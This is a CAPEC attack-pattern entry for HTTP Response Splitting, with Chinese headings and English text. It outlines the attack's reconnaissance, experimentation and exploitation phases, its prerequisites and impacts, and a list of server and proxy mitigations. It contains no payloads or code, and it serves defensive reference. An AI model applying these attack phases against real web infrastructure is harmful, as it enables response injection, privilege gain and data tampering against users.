CAPEC-34: HTTP Response Splitting
CAPEC版本: 3.9
更新日期: 2023-01-24
攻击模式描述
执行流程
步骤 1 Explore
[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets
- Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.
步骤 1 Experiment
[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.
步骤 2 Experiment
[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.
- Continue the monitoring of HTTP traffic.
- Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.
步骤 1 Exploit
[Perform HTTP Response Splitting attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.
- Leverage techniques identified in the Experiment Phase.
前提条件
- A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).
- Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.
- HTTP headers capable of being user-manipulated.
- HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses.
所需技能
所需资源
- Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages.
后果影响
影响范围: Confidentiality Integrity Availability
技术影响: Execute Unauthorized Commands
影响范围: Confidentiality Access Control Authorization
技术影响: Gain Privileges
影响范围: Integrity
技术影响: Modify Data
缓解措施
Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.
Configuration: front-end HTTP agents notice ambiguous requests.
Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.
Configuration: Disable reuse of back-end connections.
Configuration: Use HTTP/2 for back-end connections.
Configuration: Use the same web server software for front-end and back-end server.
Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.
Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)
Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.
Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.
分类映射
| 分类名称 | 条目ID | 条目名称 |
|---|---|---|
| WASC | 25 | HTTP Response Splitting |